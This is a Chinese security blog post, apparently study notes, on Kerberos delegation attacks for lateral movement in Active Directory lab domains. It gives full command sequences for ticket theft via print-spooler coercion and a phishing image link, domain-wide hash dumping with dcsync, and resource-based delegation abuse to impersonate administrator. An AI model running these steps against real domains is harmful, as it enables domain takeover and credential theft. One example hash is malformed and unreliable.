<!DOCTYPE html><html lang="zh-CN"><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport"><meta content="yes" name="apple-mobile-web-app-capable"><meta content="black-translucent" name="apple-mobile-web-app-status-bar-style"><meta content="telephone=no" name="format-detection"><meta name="description" content=""><title>横向移动-3 | Hao's Blog</title><link rel="stylesheet" type="text/css" href="/css/style.css?v=undefined"><link rel="stylesheet" type="text/css" href="https://unpkg.com/normalize.css"><link rel="stylesheet" type="text/css" href="https://unpkg.com/purecss/build/pure-min.css"><link rel="stylesheet" type="text/css" href="https://unpkg.com/purecss/build/grids-responsive-min.css"><link rel="stylesheet" href="https://unpkg.com/font-awesome@4.7.0/css/font-awesome.min.css"><script type="text/javascript" src="https://unpkg.com/jquery/dist/jquery.min.js"></script><link rel="icon" mask="" sizes="any" href="/favicon.ico"><link rel="Shortcut Icon" type="image/x-icon" href="/favicon.ico"><link rel="apple-touch-icon" href="/apple-touch-icon.png"><link rel="apple-touch-icon-precomposed" href="/apple-touch-icon.png"><script type="text/javascript" src="https://unpkg.com/clipboard/dist/clipboard.min.js"></script><script type="text/javascript" src="https://unpkg.com/toastr/build/toastr.min.js"></script><link rel="stylesheet" href="https://unpkg.com/toastr/build/toastr.min.css"><div class="darkmode-toggle">🌓</div><script>var prefersDarkMode = window.matchMedia('(prefers-color-scheme: dark)');
var toggle = document.querySelector('.darkmode-toggle');
var html = document.querySelector('html');

html.dataset.dark = localStorage.dark || prefersDarkMode.matches;

toggle.addEventListener('click', () => {
localStorage.dark = !(html.dataset.dark == 'true');
html.dataset.dark = localStorage.dark;
});</script><meta name="generator" content="Hexo 7.3.0"></head><body><div class="body_container"><div id="header"><div class="site-name"><h1 class="hidden">横向移动-3</h1><a id="logo" href="/.">Hao's Blog</a><p class="description"></p></div><div id="nav-menu"><a class="current" href="/."><i class="fa fa-home"> 首页</i></a><a href="/archives/"><i class="fa fa-archive"> 归档</i></a><a href="/about/"><i class="fa fa-user"> 关于</i></a></div></div><div class="pure-g" id="layout"><div class="pure-u-1 pure-u-md-3-4"><div class="content_container"><div class="post"><h1 class="post-title">横向移动-3</h1><div class="post-meta">2025-06-19<span> | </span><span class="category"><a href="/categories/%E5%86%85%E7%BD%91/">内网</a></span></div><div class="clear"><div class="toc-article" id="toc"><div class="toc-title">文章目录</div><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8-3%EF%BC%88kerberos%EF%BC%89"><span class="toc-number">1.</span> <span class="toc-text">横向移动-3（kerberos）</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%A7%94%E6%B4%BE%E5%AE%89%E5%85%A8"><span class="toc-number">1.1.</span> <span class="toc-text">委派安全</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%80%EF%BC%8C%E9%9D%9E%E7%BA%A6%E6%9D%9F%E5%A7%94%E6%B4%BE"><span class="toc-number">1.2.</span> <span class="toc-text">一，非约束委派</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BA%8C%EF%BC%8C%E8%B5%84%E6%BA%90%E7%BA%A6%E6%9D%9F%E5%A7%94%E6%B4%BE-%E5%88%A9%E7%94%A8%E5%9F%9F%E7%94%A8%E6%88%B7%E4%B8%BB%E6%9C%BA%E5%8A%A0%E5%85%A5%EF%BC%88SID%E4%B8%80%E8%87%B4%E6%97%B6%EF%BC%89"><span class="toc-number">1.3.</span> <span class="toc-text">二，资源约束委派-利用域用户主机加入（SID一致时）</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1%EF%BC%8C%E8%8E%B7%E5%8F%96%E5%8F%97%E5%AE%B3%E7%9B%AE%E6%A0%87%EF%BC%88%E9%9C%80%E8%A6%81%E5%85%88%E4%B8%8A%E4%BC%A0AdFind%EF%BC%89"><span class="toc-number">1.3.1.</span> <span class="toc-text">1，获取受害目标（需要先上传AdFind）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2%E3%80%81%E5%88%A9%E7%94%A8%E6%96%B0%E5%A2%9E%E6%9C%BA%E5%99%A8%E8%B4%A6%E6%88%B7"><span class="toc-number">1.3.2.</span> <span class="toc-text">2、利用新增机器账户</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3%E3%80%81%E8%8E%B7%E5%8F%96sid"><span class="toc-number">1.3.3.</span> <span class="toc-text">3、获取sid</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#4-%E8%AE%BE%E7%BD%AE%E4%BF%AE%E6%94%B9%E5%A7%94%E6%B4%BE%E5%B1%9E%E6%80%A7"><span class="toc-number">1.3.4.</span> <span class="toc-text">4,设置修改委派属性</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#5-%E9%AA%8C%E8%AF%81%E4%BF%AE%E6%94%B9%E6%98%AF%E5%90%A6%E6%88%90%E5%8A%9F"><span class="toc-number">1.3.5.</span> <span class="toc-text">5,验证修改是否成功</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#6-%E6%B8%85%E9%99%A4%E4%BF%AE%E6%94%B9%E8%AE%BE%E7%BD%AE"><span class="toc-number">1.3.6.</span> <span class="toc-text">6,清除修改设置</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#7-%E5%88%A9%E7%94%A8%E4%BF%AE%E6%94%B9%E5%90%8E%E7%9A%84%E5%B1%9E%E6%80%A7%E7%94%B3%E8%AF%B7%E7%9B%AE%E6%A0%87%E8%AF%B7%E6%B1%82%E7%A5%A8%E6%8D%AE%E5%90%8E%E5%AF%BC%E5%85%A5%E5%88%A9%E7%94%A8"><span class="toc-number">1.3.7.</span> <span class="toc-text">7,利用修改后的属性申请目标请求票据后导入利用</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%89%EF%BC%8C%E8%B5%84%E6%BA%90%E7%BA%A6%E6%9D%9F%E5%A7%94%E6%B4%BE-Acount-Operators-%E7%BB%84%EF%BC%88SID%E4%B8%8D%E4%B8%80%E8%87%B4%E6%97%B6%EF%BC%89"><span class="toc-number">1.4.</span> <span class="toc-text">三，资源约束委派-Acount Operators 组（SID不一致时）</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1%E3%80%81%E5%88%A4%E6%96%AD%E6%98%AF%E5%90%A6%E6%9C%89%E5%88%A9%E7%94%A8%E6%9D%A1%E4%BB%B6%EF%BC%9A"><span class="toc-number">1.4.1.</span> <span class="toc-text">1、判断是否有利用条件：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2%E3%80%81%E5%90%8E%E7%BB%AD%E5%88%A9%E7%94%A8%E5%90%8C%E4%B8%8A"><span class="toc-number">1.4.2.</span> <span class="toc-text">2、后续利用同上</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%9B%9B%EF%BC%8C%E7%BB%93%E5%90%88HTLM-Relay%E6%94%BB%E5%87%BB%E6%8B%BF%E4%B8%8B%E4%B8%BB%E6%9C%BA"><span class="toc-number">1.5.</span> <span class="toc-text">四，结合HTLM Relay攻击拿下主机</span></a></li></ol></li></ol></div></div><div class="post-content"><h1 id="横向移动-3（kerberos）"><a href="#横向移动-3（kerberos）" class="headerlink" title="横向移动-3（kerberos）"></a>横向移动-3（kerberos）</h1><h2 id="委派安全"><a href="#委派安全" class="headerlink" title="委派安全"></a>委派安全</h2><p><a target="_blank" rel="noopener" href="https://forum.butian.net/share/1591">https://forum.butian.net/share/1591</a><br>什么是委派？<br>委派是一种域内应用模式，是指将域内用户账户的权限委派给服务账号，服务账号因此能以用户的身份再域内展开活动（请求新的服务等），类似于租房中介房东的关系。</p>
<p>域委派分类：<br>1，非约束委派(UnconstrainedDelegation,UD)<br>2，约束委派(Constrained Delegation,CD)<br>3，基于资源的约束委派(ResourceBasedConstrainedDelegation,RBCD)<br>简而言之，非约束委派是指用户账户将自身的TGT转发给服务账户使用。约束委派通过<br>S4U2Se1f和S4U2PrOxy两个扩展协议限制服务账户只能访问指定服务资源。<br>RBCD主要就是委派的管理移交给服务资源进行控制，其余和约束性委派基本相同。</p>
<p>利用场景：<br>攻击者拿到了一台配置非约束委派的机器权限，可以诱导DC来访问该机器，然后得到管理员的TGT，从而模拟域管理用户。</p>
<h2 id="一，非约束委派"><a href="#一，非约束委派" class="headerlink" title="一，非约束委派"></a>一，非约束委派</h2><p>⽤户 A 去访问服务B，服务 B 的服务账户开启了⾮约束委派，那么当⽤户 A 访问服务 B 的时候会将⽤户 A 的 TGT发送给服务 B 并保存进内存，服务 B 能够利⽤⽤户 A 的身份去访问⽤户 A 能够访问的任意服务。</p>
<p><strong>利用思路:</strong></p>
<ul>
<li>先通过ldapsearch或者adfind或者powerview查询域内配置了非约束性委派的机器。</li>
<li>那下目标机器权限。</li>
<li>诱导域管对我们这台机器进行委派(通过使用钓鱼或者打印机哪个漏洞)。</li>
<li>拿到域管的TGT</li>
<li>将域管的TGT注入</li>
</ul>
<p>查找域内⾮约束委派⽤户和计算机</p>
<figure class="highlight mipsasm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">列出域控制器名称：</span><br><span class="line">AdFind -<span class="keyword">sc </span>dclist</span><br><span class="line">查询当前域中在线的计算机：</span><br><span class="line">AdFind -<span class="keyword">sc </span>computers_active</span><br><span class="line">查询当前域中在线的计算机(只显示名称和操作系统)：</span><br><span class="line">AdFind -<span class="keyword">sc </span>computers_active name operatingSystem</span><br><span class="line">查询当前域中所有计算机：</span><br><span class="line">AdFind -f <span class="string">&quot;objectcategory=computer&quot;</span></span><br><span class="line">查询当前域中所有计算机(只显示名称和操作系统)：</span><br><span class="line">AdFind -f <span class="string">&quot;objectcategory=computer&quot;</span> name operatingSystem</span><br><span class="line">查询域内所有用户：</span><br><span class="line">AdFind -users name</span><br><span class="line">查询所有GPO：</span><br><span class="line">AdFind -<span class="keyword">sc </span>gpodmp</span><br></pre></td></tr></table></figure>
<p>查询域内设置了非约束委派的服务账户：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">AdFind.exe -b &quot;DC=xiaodi,DC=local&quot; -f &quot;(&amp;(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=524288))&quot; dn</span><br></pre></td></tr></table></figure>
<p>查询域内设置了非约束委派的机器账户：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">AdFind.exe -b &quot;DC=xiaodi,DC=local&quot; -f &quot;(&amp;(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288))&quot; dn</span><br></pre></td></tr></table></figure>
<p>1,诱使管理员访问机器<br>利用条件：</p>
<ul>
<li>需要administrator权限</li>
<li>域内主机的机器账户开启非约束委派</li>
<li>域控管理员远程访问（被动或主动）</li>
</ul>
<p><strong>利用思路1：</strong><br>1，域控域委派机器通讯（偏理想化，不实用）<br>主动：</p>
<figure class="highlight stata"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">net</span> <span class="keyword">use</span> \\webserver</span><br></pre></td></tr></table></figure>
<p>钓鱼：</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.3.32/31.html</span><br><span class="line"><span class="meta">&lt;!DOCTYPE <span class="keyword">html</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">html</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">head</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">title</span>&gt;</span><span class="tag">&lt;/<span class="name">title</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">head</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">body</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">img</span> <span class="attr">src</span>=<span class="string">&quot;file:///\\\192.168.3.32\2&quot;</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p>2，导出票据到本地</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mimikatz sekurlsa::tickets /<span class="keyword">export</span></span><br></pre></td></tr></table></figure>
<p>3，导入票据到内存</p>
<figure class="highlight subunit"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mimikatz kerberos::ptt [0;22d3a]<span class="string">-2</span><span class="string">-1</span><span class="string">-40</span>e00000-Administrator@krbtgt-god.org.kirbi</span><br></pre></td></tr></table></figure>
<p>4,连接通讯域控</p>
<figure class="highlight dockerfile"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">shell</span><span class="language-bash"> <span class="built_in">dir</span> \\<span class="built_in">test</span>\c$</span></span><br></pre></td></tr></table></figure>
<p><strong>利用思路2：</strong><br>利用条件：DC 2012以上</p>
<ul>
<li>Administrator权限监听</li>
<li>打印机服务spooler开启（默认开启）</li>
</ul>
<p>利用过程：<br>1，监听来自DC的请求数据并保存文件</p>
<figure class="highlight smali"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">shell Rubeus.exe<span class="built_in"> monitor </span>/interval:2 /filteruser:dc$ &gt;hash.txt</span><br></pre></td></tr></table></figure>
<p>域用户运行SpoolSample强制让DC请求</p>
<figure class="highlight vim"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">shell</span> SpoolSample.<span class="keyword">exe</span> dc web2016</span><br></pre></td></tr></table></figure>
<p>2，Rubeus监听到票据并导入该票据</p>
<figure class="highlight vim"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">shell</span> Rubeus.<span class="keyword">exe</span> ptt /ticke<span class="variable">t:xxx</span></span><br></pre></td></tr></table></figure>
<p>3，使用mimikatz导出域内hash</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mimikatz lsadump::dcsync /domain:test8.com /all /csv</span><br></pre></td></tr></table></figure>
<p>4，使用wmi借助hash横向移动</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python wmiexec.py -hashes :518b32ca32c32144ck421aa31c321c test8.com/administrator@dc.test8.com -no-pass</span><br></pre></td></tr></table></figure>

<h2 id="二，资源约束委派-利用域用户主机加入（SID一致时）"><a href="#二，资源约束委派-利用域用户主机加入（SID一致时）" class="headerlink" title="二，资源约束委派-利用域用户主机加入（SID一致时）"></a>二，资源约束委派-利用域用户主机加入（SID一致时）</h2><h3 id="1，获取受害目标（需要先上传AdFind）"><a href="#1，获取受害目标（需要先上传AdFind）" class="headerlink" title="1，获取受害目标（需要先上传AdFind）"></a>1，获取受害目标（需要先上传AdFind）</h3><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">AdFind.exe -h 192.168.3.33 -b &quot;DC=xiaodi,DC=local&quot; -f &quot;objectClass=computer&quot; mS-DS-CreatorSID</span><br></pre></td></tr></table></figure>
<p>如果两台主机SID相同，则存在资源约束委派的可能性，SID不同就不存在利用的可能性<br><img src="/img/image3.png" alt="alt text"><br>根据查询出来的 sid 找出对应的用户名：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">shell AdFind.exe -b &quot;DC=xiaodi,DC=local&quot; -f &quot;(&amp;(objectsid=S-1-5-21-1695257952-3088263962-2055235443-1104))&quot; objectclass cn dn</span><br></pre></td></tr></table></figure>
<p><img src="/img/image4.png" alt="alt text"><br>这里找出来对应的用户名是dbadmin，如果我们有这个用户的权限那么就可以进行攻击</p>
<h3 id="2、利用新增机器账户"><a href="#2、利用新增机器账户" class="headerlink" title="2、利用新增机器账户"></a>2、利用新增机器账户</h3><p>添加一个机器账户，用于申请票据（以下有三种方式）</p>
<ul>
<li>使用 addcpmputer 创建机器账户</li>
</ul>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python addcomputer.py xiaodi8.com/web2016:Xiaodi12345 -method LDAPS -computer-name test01\$ -computer-pass Passw0rd -dc-ip 192.168.139.11</span><br></pre></td></tr></table></figure>
<ul>
<li>使用 bloodyAD 工具创建机器账户</li>
</ul>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python bloodyAD.py -d redteam.lab -u web2016 -p &#x27;Xiaodi12345&#x27; --host 192.168.139.11 addComputer test01 &#x27;Passw0rd&#x27;</span><br></pre></td></tr></table></figure>
<ul>
<li>使用 PowerMad 工具创建机器账户（推荐）但需要上传文件<br><a target="_blank" rel="noopener" href="https://github.com/Kevin-Robertson/Powermad">https://github.com/Kevin-Robertson/Powermad</a></li>
</ul>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">powershell <span class="built_in">Set-ExecutionPolicy</span> Bypass <span class="literal">-Scope</span> <span class="keyword">Process</span></span><br><span class="line">powershell <span class="built_in">Import-Module</span> .\Powermad.ps1;<span class="built_in">New-MachineAccount</span> <span class="literal">-MachineAccount</span> serviceA <span class="literal">-Password</span> <span class="variable">$</span>(<span class="built_in">ConvertTo-SecureString</span> <span class="string">&quot;123456&quot;</span> <span class="literal">-AsPlainText</span> <span class="literal">-Force</span>)</span><br></pre></td></tr></table></figure>
<p>执行后就会发现多了一个serviceA用户<br><img src="/img/image5.png" alt="alt text"></p>
<h3 id="3、获取sid"><a href="#3、获取sid" class="headerlink" title="3、获取sid"></a>3、获取sid</h3><p><a target="_blank" rel="noopener" href="https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1">https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1</a></p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">Import-Module</span> .\PowerView.ps1</span><br><span class="line"><span class="built_in">Get-NetComputer</span> serviceA <span class="literal">-Properties</span> objectsid</span><br><span class="line">S<span class="literal">-1-5-21-1695257952-3088263962-2055235443-1104</span></span><br></pre></td></tr></table></figure>
<h3 id="4-设置修改委派属性"><a href="#4-设置修改委派属性" class="headerlink" title="4,设置修改委派属性"></a>4,设置修改委派属性</h3><p>即msDS-AllowedToActOnBehalfOfOtherIdentity属性</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">powershell</span><br><span class="line"><span class="built_in">Set-ExecutionPolicy</span> Bypass <span class="literal">-Scope</span> <span class="keyword">Process</span></span><br><span class="line"><span class="built_in">import-module</span> .\powerview.ps1</span><br><span class="line"><span class="variable">$SD</span> = <span class="built_in">New-Object</span> Security.AccessControl.RawSecurityDescriptor <span class="literal">-ArgumentList</span> <span class="string">&quot;O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-1695257952-3088263962-2055235443-1104)&quot;</span>		<span class="comment">#将SID修改为上方获取的SID值</span></span><br><span class="line"><span class="variable">$SDBytes</span> = <span class="built_in">New-Object</span> byte[] (<span class="variable">$SD</span>.BinaryLength)</span><br><span class="line"><span class="variable">$SD</span>.GetBinaryForm(<span class="variable">$SDBytes</span>, <span class="number">0</span>)</span><br><span class="line"><span class="built_in">Get-DomainComputer</span> <span class="keyword">DATA</span>| <span class="built_in">Set-DomainObject</span> <span class="literal">-Set</span> <span class="selector-tag">@</span>&#123;<span class="string">&#x27;msds-allowedtoactonbehalfofotheridentity&#x27;</span>=<span class="variable">$SDBytes</span>&#125; <span class="literal">-Verbose</span></span><br></pre></td></tr></table></figure>
<h3 id="5-验证修改是否成功"><a href="#5-验证修改是否成功" class="headerlink" title="5,验证修改是否成功"></a>5,验证修改是否成功</h3><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">Get-DomainComputer</span> <span class="keyword">DATA</span> <span class="literal">-Properties</span> msds<span class="literal">-allowedtoactonbehalfofotheridentity</span></span><br></pre></td></tr></table></figure>

<h3 id="6-清除修改设置"><a href="#6-清除修改设置" class="headerlink" title="6,清除修改设置"></a>6,清除修改设置</h3><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">Set-DomainObject</span> <span class="keyword">DATA</span> <span class="literal">-Clear</span> <span class="string">&#x27;msds-allowedtoactonbehalfofotheridentity&#x27;</span> <span class="literal">-Verbose</span></span><br></pre></td></tr></table></figure>
<h3 id="7-利用修改后的属性申请目标请求票据后导入利用"><a href="#7-利用修改后的属性申请目标请求票据后导入利用" class="headerlink" title="7,利用修改后的属性申请目标请求票据后导入利用"></a>7,利用修改后的属性申请目标请求票据后导入利用</h3><p>利用 serviceA 申请访问 data 主机 cifs 服务票据：<br>目标主机上一般没有python环境，代理转发到本地使用py脚本<br>getST.py</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python getST.py -dc-ip 192.168.3.33 xiaodi.local/serviceA\$:123456 -spn cifs/data.xiaodi.local -impersonate administrator</span><br></pre></td></tr></table></figure>
<p>执行完后就会产生一个ccache文件</p>
<p>将他传到机器上</p>
<p>导入票据到内存：</p>
<figure class="highlight arduino"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mimikatz kerberos::ptc administrator.ccache</span><br></pre></td></tr></table></figure>
<p>连接利用票据：</p>
<figure class="highlight stata"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">shell</span> <span class="keyword">dir</span> \\data.xiaodi.<span class="keyword">local</span>\c$</span><br></pre></td></tr></table></figure>
<p>kali上：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_">#</span><span class="language-bash">使用getST.py申请票据</span></span><br><span class="line">python3 getST.py xiaodi.local/serviceA\$:123456 -spn cifs/data.xiaodi.local -impersonate administrator -dc-ip 192.168.3.33</span><br><span class="line"><span class="meta prompt_"></span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">导入票据</span></span><br><span class="line">export KRB5CCNAME=/root/Desktop/administrator.ccache</span><br><span class="line"><span class="meta prompt_"></span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">直接登录</span></span><br><span class="line">python3 wmiexec.py -k xiaodi.local/administrator@data.redteam.lab -no-pass</span><br><span class="line">python3 psexec.py -k redteam.lab/administrator@data.redteam.lab -no-pass</span><br></pre></td></tr></table></figure>

<h2 id="三，资源约束委派-Acount-Operators-组（SID不一致时）"><a href="#三，资源约束委派-Acount-Operators-组（SID不一致时）" class="headerlink" title="三，资源约束委派-Acount Operators 组（SID不一致时）"></a>三，资源约束委派-Acount Operators 组（SID不一致时）</h2><p>利用思路：<br>Acount Operators 组成员可修改域内任意主机的<br>msDS-AllowedToActOnBehalfOfOtherIdentity 属性。（除 DC）</p>
<p>利用条件：<br>1、获取到属于 Acount Operators 组的用户账户<br>2、可以创建机器账户</p>
<h3 id="1、判断是否有利用条件："><a href="#1、判断是否有利用条件：" class="headerlink" title="1、判断是否有利用条件："></a>1、判断是否有利用条件：</h3><p>查询 Acount Operators 组成员：</p>
<figure class="highlight mipsasm"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">shell </span>adfind.exe -h <span class="number">192</span>.<span class="number">168</span>.<span class="number">3</span>.<span class="number">33</span>:<span class="number">389</span> -s <span class="keyword">subtree </span>-<span class="keyword">b </span>CN=<span class="string">&quot;Account Operators&quot;</span>,CN=<span class="keyword">Builtin,DC=xiaodi,DC=local </span>member</span><br></pre></td></tr></table></figure>
<p><img src="/img/image6.png" alt="alt text"></p>
<h3 id="2、后续利用同上"><a href="#2、后续利用同上" class="headerlink" title="2、后续利用同上"></a>2、后续利用同上</h3><ul>
<li>新增机器账户</li>
<li>利用新增机器账户修改委派属性满足申请访问目标票款</li>
<li>利用修改后的属性申请目标请求票据后导入利用</li>
</ul>
<h2 id="四，结合HTLM-Relay攻击拿下主机"><a href="#四，结合HTLM-Relay攻击拿下主机" class="headerlink" title="四，结合HTLM Relay攻击拿下主机"></a>四，结合HTLM Relay攻击拿下主机</h2><p>绕过NTLM MIC校验+打印机漏洞+NTLM Relay+基于资源的约束性委派组合攻击<br>利用条件：</p>
<ul>
<li>能创建机器账户</li>
<li>目标开启打印机服务</li>
</ul>
</div><div class="tags"><ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/%E5%86%85%E7%BD%91/" rel="tag">内网</a></li></ul></div><div class="post-nav"><a class="pre" href="/2025/06/19/%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8-4/">横向移动-4</a><a class="next" href="/2025/06/19/%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8-2/">横向移动-2</a></div></div></div></div><div class="pure-u-1-4 hidden_mid_and_down"><div id="sidebar"><div class="widget"><div class="search-form"><input id="local-search-input" placeholder="Search" type="text" name="q" results="0"/><div id="local-search-result"></div></div></div><div class="widget"><div class="author-info"><a class="info-avatar" href="/about/" title="关于"><img class="nofancybox" src="/img/avatar.jpg"/></a><p>所幸仍有光.</p><a class="info-icon" href="https://hackerhao.top" title="Email" target="_blank" style="margin-inline:5px"> <i class="fa fa-envelope-square" style="margin-inline:5px"></i></a><a class="info-icon" href="https://github.com/isMyHao" title="Github" target="_blank" style="margin-inline:5px"> <i class="fa fa-github-square" style="margin-inline:5px"></i></a></div></div><div class="widget"><div class="widget-title"><i class="fa fa-folder-o"> 分类</i></div><ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/Java-Web%E5%B8%B8%E8%A7%81%E6%BC%8F%E6%B4%9E/">Java Web常见漏洞</a><span class="category-list-count">4</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/Java%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/">Java基础知识</a><span class="category-list-count">6</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/Java%E5%AE%89%E5%85%A8/">Java安全</a><span class="category-list-count">9</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/Js%E5%AE%89%E5%85%A8/">Js安全</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/PHP%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/">PHP代码审计</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/PHP%E5%AE%89%E5%85%A8/">PHP安全</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/Win%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87/">Win权限提升</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/linux%E6%8F%90%E6%9D%83/">linux提权</a><span class="category-list-count">2</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/tools/">tools</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E4%BA%91%E5%AE%89%E5%85%A8/">云安全</a><span class="category-list-count">3</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/">代码审计</a><span class="category-list-count">4</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E5%85%8D%E6%9D%80/">免杀</a><span class="category-list-count">3</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E5%86%85%E7%BD%91/">内网</a><span class="category-list-count">7</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/">基础知识</a><span class="category-list-count">6</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87/">权限提升</a><span class="category-list-count">2</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E6%BC%8F%E6%B4%9E%E5%8F%91%E7%8E%B0/">漏洞发现</a><span 